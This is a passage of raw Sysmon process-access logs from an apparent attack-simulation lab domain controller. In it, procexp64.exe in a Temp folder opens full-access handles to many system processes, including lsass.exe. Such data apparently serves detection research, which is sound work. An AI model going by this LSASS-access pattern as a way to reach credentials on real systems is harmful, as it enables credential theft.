15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787700Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787699Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787698Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787697Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787696Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787695Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787694Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787693Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787692Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787691Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787690Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787689Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787688Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787687Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787686Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787685Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787684Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787683Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787682Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787681Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787680Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787679Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787678Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787677Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787676Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787926Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787925Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787924Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787923Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787922Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787921Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787920Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787919Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787918Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787917Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787916Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787915Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 